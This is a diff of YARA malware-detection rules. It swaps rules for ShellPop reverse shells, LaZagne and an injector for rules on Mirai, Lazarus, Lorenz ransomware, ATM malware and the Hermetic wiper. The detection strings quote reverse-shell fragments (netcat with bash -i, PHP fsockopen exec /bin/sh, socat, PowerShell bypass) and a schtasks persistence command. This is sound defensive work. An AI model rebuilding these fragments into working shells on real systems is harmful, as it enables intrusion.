+		id = "40edcb29-9e10-5b87-ba79-8e3f629829e5"
+		date = "2019-11-13"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/bad_packets/status/1194049104533282816"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L140-L157"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "90d200e79c97911b105e592549bc2c04fb09ce841413c30117d421b45bb9988c"
-		score = 60
+		logic_hash = "e1202a9cd445c590c359a9c93e635292f8cf7f09291f4d8504ad9ce6679f6a47"
+		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "456c1c25313ce2e2eedf24fdcd4d37048bcfff193f6848053cbb3b5e82cd527d"
+		tags = "FILE"
+		hash1 = "bbb83da15d4dabd395996ed120435e276a6ddfbadafb9a7f096597c869c6c739"
+		hash2 = "fadbbe439f80cc33da0222f01973f27cce9f5ab0709f1bfbf1a954ceac5a579b"
 
 	strings:
-		$x1 = "Error injecting remote thread in process:" fullword ascii
-		$s5 = "[-] Error getting access to process: %ld!" fullword ascii
-		$s6 = "--process-name <name>  Process name to inject" fullword ascii
-		$s12 = "No injection target has been provided!" fullword ascii
-		$s17 = "[-] An app path is required when not injecting!" fullword ascii
+		$s1 = "SERVZUXO" fullword ascii
+		$s2 = "-loldongs" fullword ascii
+		$s3 = "/dev/null" fullword ascii
+		$s4 = "/bin/busybox" fullword ascii
+		$sc1 = { 47 72 6F 75 70 73 3A 09 30 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and ( pe.imphash ( ) == "d27e0fa013d7ae41be12aaf221e41f9b" or 1 of them ) or 3 of them
+		uint16( 0 ) == 0x457f and filesize <= 100KB and 4 of them
 }
-rule SIGNATURE_BASE_Lazagne_PW_Dumper
+rule SIGNATURE_BASE_MAL_ARM_LNX_Mirai_Mar13_2022 : FILE
 {
 	meta:
-		description = "Detects Lazagne PW Dumper"
-		author = "Markus Neis / Florian Roth"
-		id = "1904029e-9336-5278-ae2e-4bc853316600"
-		date = "2018-03-22"
-		modified = "2025-04-14"
-		reference = "https://github.com/AlessandroZ/LaZagne/releases/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4221-L4235"
+		description = "Detects new ARM Mirai variant"
+		author = "Mehmet Ali Kerimoglu a.k.a. CYB3RMX"
+		id = "54d8860e-fc45-5571-b68c-66590c67a705"
+		date = "2022-03-16"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_mirai.yar#L159-L181"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2eac81d5cecdaca7eeaa83be70a688a595f8bbf54679ee565ba325b9e384552b"
-		score = 70
+		logic_hash = "a44a6174a198a658c8a5e2da50192da20bae7f8ed4e4f212c9eebb29fa4b0dd0"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "0283b72913b8a78b2a594b2d40ebc3c873e4823299833a1ff6854421378f5a68"
 
 	strings:
-		$s1 = "Crypto.Hash" fullword ascii
-		$s2 = "laZagne" fullword ascii
-		$s3 = "impacket.winregistry" fullword ascii
+		$str1 = "/home/landley/aboriginal/aboriginal/build/temp-armv6l/gcc-core/gcc/config/arm/lib1funcs.asm"
+		$str2 = "/home/landley/aboriginal/aboriginal/build/temp-armv6l/gcc-core/gcc/config/arm/lib1funcs.asm"
+		$str3 = "/home/landley/aboriginal/aboriginal/build/temp-armv6l/gcc-core/gcc/config/arm"
+		$str4 = "/home/landley/aboriginal/aboriginal/build/simple-cross-compiler-armv6l/bin/../cc/include"
+		$attck1 = "attack.c"
+		$attck2 = "attacks.c"
+		$attck3 = "anti_gdb_entry"
+		$attck4 = "resolve_cnc_addr"
+		$attck5 = "attack_gre_eth"
+		$attck6 = "attack_udp_generic"
+		$attck7 = "attack_get_opt_ip"
+		$attck8 = "attack_icmpecho"
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x457f and ( 3 of ( $str* ) or 4 of ( $attck* ) )
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Tclsh : FILE
+rule SIGNATURE_BASE_SUSP_TINY_PE : FILE
 {
 	meta:
-		description = "Detects suspicious TCLsh popshell"
-		author = "Tobias Michalski"
-		id = "24f6b626-383e-54c9-abd4-bd67c37af937"
-		date = "2018-05-18"
-		modified = "2025-04-14"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4237-L4249"
+		description = "Detects Tiny PE file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5081c24e-91d1-5705-9459-f675be4f0e3c"
+		date = "2019-10-23"
+		modified = "2023-12-05"
+		reference = "https://webserver2.tecgraf.puc-rio.br/~ismael/Cursos/YC++/apostilas/win32_xcoff_pe/tyne-example/Tiny%20PE.htm"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_file_anomalies.yar#L3-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "622805e8067f5158d82783971dcf31e8db05f1d52a38bd1ec3e76ddbbd78032b"
-		score = 65
+		logic_hash = "5eabfa8e0fd4d6d1376d263484fba985e7a4b05d68046be1f79c1dfdbbfff9e5"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "9f49d76d70d14bbe639a3c16763d3b4bee92c622ecb1c351cb4ea4371561e133"
 
 	strings:
-		$s1 = "{ puts -nonewline $s \"shell>\";flush $s;gets $s c;set e \"exec $c\";if" ascii
+		$header = { 4D 5A 00 00 50 45 00 00 }
 
 	condition:
-		filesize < 1KB and 1 of them
+		uint16( 0 ) == 0x5a4d and uint16( 4 ) == 0x4550 and filesize <= 20KB and $header at 0
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Ruby : FILE
+rule SIGNATURE_BASE_SUSP_GIF_Anomalies : FILE
 {
 	meta:
-		description = "Detects suspicious ruby shellpop"
-		author = "Tobias Michalski"
-		id = "cb3a93d5-02a1-5a49-b37e-3f9312b993ea"
-		date = "2018-05-18"
-		modified = "2025-04-14"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4251-L4263"
+		description = "Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2e77c2ff-a8f6-5444-a93d-843312640a28"
+		date = "2020-07-02"
+		modified = "2023-12-05"
+		reference = "https://en.wikipedia.org/wiki/GIF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_file_anomalies.yar#L17-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aa076540ef01d04117d3340f4d84c21f79acfc558ed4aa585d801b6a6bc797a2"
-		score = 65
+		logic_hash = "64d17c8de72600cd889a802fd002faaaf9a3a17f7fa157ae5b2b620b28e6c439"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		hash1 = "6b425b37f3520fd8c778928cc160134a293db0ce6d691e56a27894354b04f783"
-
-	strings:
-		$x1 = ");while(cmd=c.gets);IO.popen(cmd,'r'){" ascii
 
 	condition:
-		filesize < 1KB and all of them
+		uint16( 0 ) == 0x4947 and uint8( 2 ) == 0x46 and uint8( 11 ) != 0x00 and uint8( 12 ) != 0x00 and uint8( filesize -1 ) != 0x3b
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Awk : FILE
+
+rule SIGNATURE_BASE_SUSP_Hxd_Icon_Anomaly_May23_1 : FILE
 {
 	meta:
-		description = "Detects suspicious AWK Shellpop"
-		author = "Tobias Michalski"
-		id = "92d1e6dd-d758-5df2-b5e5-eb275964551d"
-		date = "2018-05-18"
-		modified = "2025-04-14"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4265-L4278"
+		description = "Detects suspicious use of the the free hex editor HxD's icon in PE files that don't seem to be a legitimate version of HxD"
+		author = "Florian Roth"
+		id = "3ac8cc92-6d76-5787-ada0-cfb6eabb4b20"
+		date = "2023-05-29"
+		modified = "2023-12-05"
+		reference = "https://www.linkedin.com/feed/update/urn:li:activity:7068631930040188929/?utm_source=share&utm_medium=member_ios"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_file_anomalies.yar#L32-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7d676ffbd1ce083a1b8e34576125fb0805caef4423089cd72a92483467669b78"
+		logic_hash = "a328687ac8b868fb78a49188b286a8951c6043a7ff6ff0c7a23c3f9b3ef15eb2"
 		score = 65
 		quality = 85
 		tags = "FILE"
-		hash1 = "7513a0a0ba786b0e22a9a7413491b4011f60af11253c596fa6857fb92a6736fc"
 
 	strings:
-		$s1 = "awk 'BEGIN {s = \"/inet/tcp/0/" ascii
-		$s2 = "; while(42) " ascii
+		$ac1 = { 99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
+               99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
+               99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
+               99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
+               99 00 77 0D DD 09 99 80 99 00 77 0D D0 99 98 09
+               99 99 00 0D D0 99 98 09 99 99 00 0D D0 99 98 09
+               99 99 00 0D D0 99 98 0F F9 99 00 0D D0 99 98 09
+               9F 99 00 0D D0 99 98 09 FF 99 00 0D D0 99 98 09
+               FF 99 00 0D D0 99 98 09 99 99 00 0D D0 99 98 0F
+               F9 99 00 0D D0 99 98 09 99 99 00 0D 09 99 80 9F
+               F9 99 99 00 09 99 80 99 F9 99 99 00 09 99 80 FF }
+		$ac2 = { FF FF FF FF FF FF FF FF FF FF FF FF FF FF B9 DE
+               FA 68 B8 F4 39 A2 F1 39 A2 F1 39 A2 F1 39 A2 F1
+               39 A2 F1 39 A2 F1 68 B8 F4 B9 DE FA FF FF FF FF
+               FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF }
+		$s1 = { 00 4D 00 61 00 EB 00 6C 00 20 00 48 00 F6 00 72 00 7A }
+		$s2 = "mh-nexus.de" ascii wide
+		$upx1 = "UPX0" ascii fullword
+		$xs1 = "terminator" ascii wide fullword
+		$xs2 = "Terminator" ascii wide fullword
 
 	condition:
-		filesize < 1KB and 1 of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $ac* ) and ( not 1 of ( $s* ) or filesize > 6930000 or ( pe.is_32bit ( ) and filesize < 1540000 and not $upx1 ) or ( pe.is_32bit ( ) and filesize < 590000 and $upx1 ) or ( pe.is_64bit ( ) and filesize < 6670000 and not $upx1 ) or ( pe.is_64bit ( ) and filesize < 1300000 and $upx1 ) or 1 of ( $xs* ) )
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Netcat_UDP : FILE
+rule SIGNATURE_BASE_ATM_Malware_Xfscashncr_1 : FILE
 {
 	meta:
-		description = "Detects suspicious netcat popshell"
-		author = "Tobias Michalski"
-		id = "67aa53b6-00bc-5d2e-b6f3-37e9121cdd01"
-		date = "2018-05-18"
-		modified = "2025-04-14"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4280-L4293"
+		description = "Detects ATM Malware XFSCashNCR"
+		author = "Frank Boldewin (@r3c0nst), modified by Florian Roth"
+		id = "0a70ef9a-9dde-54c9-a3a2-dfceff32932b"
+		date = "2019-08-28"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/r3c0nst/status/1166773324548063232"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_atm_xfscashncr.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0c85b1275ccf5bbc7f6e0ab0f1fa9d1bce7d56912411f84f9946163191c79576"
-		score = 65
+		logic_hash = "014d07115543c6e041649a1c57206a75fd555bf0458c7578a33c81b473c72751"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "d823ad91b315c25893ce8627af285bcf4e161f9bbf7c070ee2565545084e88be"
+		hash1 = "d6dff67a6b4423b5721908bdcc668951f33b3c214e318051c96e8c158e8931c0"
 
 	strings:
-		$s1 = "mkfifo fifo ; nc.traditional -u" ascii
-		$s2 = "< fifo | { bash -i; } > fifo" fullword ascii
+		$Code1 = {50 8b 4d e8 8b 51 10 52 6a 00 68 2d 01 00 00 8b 45 e8 0f b7 48 1c 51 e8}
+		$Code2 = {52 8d 45 d0 50 68 2e 01 00 00 8b 4d e8 0f b7 51 1c 52 e8}
+		$x_StatusMessage1 = "[+] Ingrese Denominacion ISO" nocase ascii
+		$x_StatusMessage2 = "[+] Ingrese numero de billetes" nocase ascii
+		$x_StatusMessage3 = "[!] FAIL.. dispensadores no encontrados" nocase ascii
+		$x_StatusMessage4 = "[!] Unable continue, IMPOSIBLE abrir dispenser" nocase ascii
+		$x_PDB = "C:\\Users\\cyttek\\Downloads\\xfs_cashXP\\Debug\\xfs_cash_ncr.pdb" nocase ascii
+		$LogFile = "XfsLog.txt" nocase ascii
 
 	condition:
-		filesize < 1KB and 1 of them
+		uint16( 0 ) == 0x5A4D and filesize < 1500KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Socat : FILE
+rule SIGNATURE_BASE_APT_Lazarus_Aug18_Downloader_1 : FILE
 {
 	meta:
-		description = "Detects suspicious socat popshell"
-		author = "Tobias Michalski"
-		id = "23c331ba-217c-5b17-b45e-d553eea76a56"
-		date = "2018-05-18"
-		modified = "2025-04-14"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4295-L4308"
+		description = "Detects Lazarus Group Malware Downloadery"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f536db7b-b645-522f-b750-6431878d2e31"
+		date = "2018-08-24"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/operation-applejeus/87553/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_applejeus.yar#L13-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "48c06096b27be11ae12cc38294acb495b739101cabc04e89eb76e93fb42c52df"
-		score = 65
+		logic_hash = "f6bdaa8aa76da3e679094ae9759a67b5db33d0445f7204ff13e400fa6db60386"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "267f69858a5490efb236628260b275ad4bbfeebf4a83fab8776e333ca706a6a0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d555dcb6da4a6b87e256ef75c0150780b8a343c4a1e09935b0647f01d974d94d"
+		hash2 = "bdff852398f174e9eef1db1c2d3fefdda25fe0ea90a40a2e06e51b5c0ebd69eb"
+		hash3 = "e2199fc4e4b31f7e4c61f6d9038577633ed6ad787718ed7c39b36f316f38befd"
 
 	strings:
-		$s1 = "socat tcp-connect" ascii
-		$s2 = ",pty,stderr,setsid,sigint,sane" ascii
+		$x1 = "H:\\DEV\\TManager\\" ascii
+		$x2 = "\\Release\\dloader.pdb" ascii
+		$x3 = "Z:\\jeus\\"
+		$x4 = "\\Debug\\dloader.pdb" ascii
+		$x5 = "Moz&Wie;#t/6T!2yW29ab@ad%Df324V$Yd" fullword ascii
+		$s1 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" fullword ascii
+		$s2 = "Error protecting memory page" fullword ascii
 
 	condition:
-		filesize < 1KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( ( 1 of ( $x* ) or 2 of them ) )
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Perl : FILE
+
+rule SIGNATURE_BASE_APT_Lazarus_Aug18_1 : FILE
 {
 	meta:
-		description = "Detects Shellpop Perl script"
-		author = "Tobias Michalski"
-		id = "d597d213-a70b-5412-adde-791b4d498848"
-		date = "2018-05-18"
-		modified = "2025-04-14"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4310-L4323"
+		description = "Detects Lazarus Group Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fda4970a-2787-5e9c-9944-a6222145f4a7"
+		date = "2018-08-24"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/operation-applejeus/87553/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_applejeus.yar#L39-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8f3c5920acdc080b437c15b93e192a00a5037be0323cc04473e238033b7d53ec"
+		logic_hash = "efd43e2d84ba964e7fc7e6c03eaba3dd5181c9cbe51b4a06a7a723dca95fab17"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "32c3e287969398a070adaad9b819ee9228174c9cb318d230331d33cda51314eb"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ef400d73c6920ac811af401259e376458b498eb0084631386136747dfc3dcfa8"
+		hash2 = "1b8d3e69fc214cb7a08bef3c00124717f4b4d7fd6be65f2829e9fd337fc7c03c"
 
 	strings:
-		$ = "perl -e 'use IO::Socket::INET;$|=1;my ($s,$r);" ascii
-		$ = ";STDIN->fdopen(\\$c,r);$~->fdopen(\\$c,w);s" ascii
+		$s1 = "mws2_32.dll" fullword wide
+		$s2 = "%s.bat" fullword wide
+		$s3 = "%s%s%s \"%s > %s 2>&1\"" fullword wide
+		$s4 = "Microsoft Corporation. All rights reserved." fullword wide
+		$s5 = "ping 127.0.0.1 -n 3" fullword wide
 
 	condition:
-		filesize < 2KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "3af996e4f960108533e69b9033503f40" or 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Python : FILE
+rule SIGNATURE_BASE_APT_Lazarus_Aug18_2 : FILE
 {
 	meta:
-		description = "Detects malicious python shell"
-		author = "Tobias Michalski"
-		id = "62fe0ae9-422e-5021-8a67-e88ff4bd2cf3"
-		date = "2018-05-18"
-		modified = "2025-04-14"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4325-L4337"
+		description = "Detects Lazarus Group Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3c77d603-6443-5e78-8a8a-a89112619aa6"
+		date = "2018-08-24"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/operation-applejeus/87553/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_applejeus.yar#L62-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e4c35bb739eeabf0de558ee1b97225ed4eb3198e7e6db1817348115b848146c7"
+		logic_hash = "75d52ad829383392d9eb20a8308278d073d16f7624e60010356534bdc6acc81f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "aee1c9e45a1edb5e462522e266256f68313e2ff5956a55f0a84f33bc6baa980b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8ae766795cda6336fd5cad9e89199ea2a1939a35e03eb0e54c503b1029d870c4"
+		hash2 = "d3ef262bae0beb5d35841d131b3f89a9b71a941a86dab1913bda72b935744d2e"
 
 	strings:
-		$ = "os.putenv('HISTFILE', '/dev/null');" ascii
+		$s1 = "vAdvapi32.dll" fullword wide
+		$s2 = "lws2_32.dll" fullword wide
+		$s3 = "%s %s > \"%s\" 2>&1" fullword wide
+		$s4 = "Not Service" fullword wide
+		$s5 = "ping 127.0.0.1 -n 3" fullword wide
 
 	condition:
-		filesize < 2KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 4 of them )
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_PHP_TCP : FILE
+rule SIGNATURE_BASE_APT_Fallchill_RC4_Keys : FILE
 {
 	meta:
-		description = "Detects malicious PHP shell"
-		author = "Tobias Michalski"
-		id = "3bafc225-62e5-5183-84aa-9c3406b6c444"
-		date = "2018-05-18"
-		modified = "2025-04-14"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4339-L4352"
+		description = "Detects FallChill RC4 keys"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ead7d84c-91aa-58b0-af3b-1211b0bde864"
+		date = "2018-08-21"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/operation-applejeus/87553/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_applejeus.yar#L84-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8ffab71130b4fa6efbe9864f97c33fed9359f79d51b84e8f952c911f24d1496c"
+		logic_hash = "59861618dba256996d7bbcd94a6efccdb64589fc75086bfe7d980fa51761ef97"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0412e1ab9c672abecb3979a401f67d35a4a830c65f34bdee3f87e87d060f0290"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "php -r \"\\$sock=fsockopen" ascii
-		$x2 = ";exec('/bin/sh -i <&3 >&3 2>&3');\"" ascii
+		$cod0 = { c7 ?? ?? da e1 61 ff
+                c7 ?? ?? 0c 27 95 87
+                c7 ?? ?? 17 57 a4 d6
+                c7 ?? ?? ea e3 82 2b }
 
 	condition:
-		filesize < 3KB and all of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Powershell_TCP : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Lorenz_May21_1 : FILE
 {
 	meta:
-		description = "Detects malicious powershell"
-		author = "Tobias Michalski"
-		id = "4f3a92db-f686-559a-9588-fb79f423c51f"
-		date = "2018-05-18"
-		modified = "2025-04-14"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4354-L4367"
+		description = "Detects Lorenz Ransomware samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0b18a4a3-82da-574b-8d10-daf2176448b9"
+		date = "2021-05-04"
+		modified = "2023-12-05"
+		reference = "Internal Research - DACH TE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ransom_lorenz.yar#L1-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8eb484ba87fa2e10af3c59445ccb4be73db2f5ae67c59118a2e188ba02fdc957"
+		logic_hash = "aec940deb2c3bc099a50a2e8f014ae425d306d331078d9ac2abc2ec7b8bf572e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "8328806700696ffe8cc37a0b81a67a6e9c86bb416364805b8aceaee5db17333f"
+		hash1 = "4b1170f7774acfdc5517fbe1c911f2bd9f1af498f3c3d25078f05c95701cc999"
+		hash2 = "8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1"
+		hash3 = "c0c99b141b014c8e2a5c586586ae9dc01fd634ea977e2714fbef62d7626eb3fb"
 
 	strings:
-		$ = "Something went wrong with execution of command on the target" ascii
-		$ = ";[byte[]]$bytes = 0..65535|%{0};$sendbytes =" ascii
+		$x1 = "process call create \"cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON " ascii fullword
+		$x2 = "-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK" ascii fullword
+		$s1 = "process call create \"cmd.exe /c schtasks /Create /F " ascii fullword
+		$s2 = "twr.ini" ascii fullword
+		$s3 = "/c wmic /node:'" ascii fullword
+		$op1 = { 0f 4f d9 81 ff dc 0f 00 00 5f 8d 4b 0? 0f 4e cb 83 fe 3c 5e 5b }
+		$op2 = { 6a 02 e8 ?? ?? 0? 00 83 c4 18 83 f8 01 75 01 cc 6a 00 68 ?? ?? 00 00 }
 
 	condition:
-		filesize < 3KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( 1 of ( $x* ) or all of ( $op* ) or 3 of them )
 }
-rule SIGNATURE_BASE_SUSP_Powershell_Shellcommand_May18_1 : FILE
+rule SIGNATURE_BASE_SUSP_Themebleed_Theme_Sep23 : FILE
 {
 	meta:
-		description = "Detects a supcicious powershell commandline"
-		author = "Tobias Michalski"
-		id = "efa81fd0-b764-5a1a-98a5-fc3135be220b"
-		date = "2018-05-18"
-		modified = "2025-04-14"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4369-L4382"
+		description = "Detects domain or IP placement in Windows theme files"
+		author = "@m_haggis, @nas_bench"
+		id = "76d0042b-655d-5d03-bcc4-150ebc92eb43"
+		date = "2023-09-13"
+		modified = "2023-12-05"
+		reference = "https://github.com/gabe-k/themebleed"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2023_38146.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bc858d74b8aad09ff539489e961e1a51ba5fe17d3424615ffe5029587ddb9478"
-		score = 65
-		quality = 85
+		logic_hash = "577003741f07aeffafd2b0b22913de44ea4f5ed264f4104ee013104355f65311"
+		score = 75
+		quality = 60
 		tags = "FILE"
-		hash1 = "8328806700696ffe8cc37a0b81a67a6e9c86bb416364805b8aceaee5db17333f"
 
 	strings:
-		$x1 = "powershell -nop -ep bypass -Command" ascii
+		$s1 = /Path=\\\\[0-9a-zA-Z\.-]{1,20}\\/
+		$s2 = "[VisualStyles]"
+		$s3 = "[Theme]"
 
 	condition:
-		filesize < 3KB and 1 of them
+		filesize < 1MB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Shellpop_Telnet_TCP : FILE
+rule SIGNATURE_BASE_APT_UA_Hermetic_Wiper_Feb22_1 : FILE
 {
 	meta:
-		description = "Detects malicious telnet shell"
-		author = "Tobias Michalski"
-		id = "dbd5cc65-c6f1-54f3-813f-7a7f9bcca184"
-		date = "2018-05-18"
-		modified = "2025-04-14"
-		reference = "https://github.com/0x00-0x00/ShellPop"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4384-L4397"
+		description = "Detects Hermetic Wiper malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2cbe4a69-e31a-5f5f-ab1a-9d71d16fb30f"
+		date = "2022-02-24"
+		modified = "2023-12-05"
+		reference = "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_hermetic_wiper.yar#L2-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e900fb8c0f1fa61f242b97ac542cb1bfd691dd50523e0023e97e3b21617053d7"
+		logic_hash = "1cf124f7533a060da8aff1a18f64a94b183502e58ffdfca012d72d99d30225ba"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "cf5232bae0364606361adafab32f19cf56764a9d3aef94890dda9f7fcd684a0e"
+		hash1 = "0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da"
+		hash2 = "3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767"
+		hash3 = "2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf"
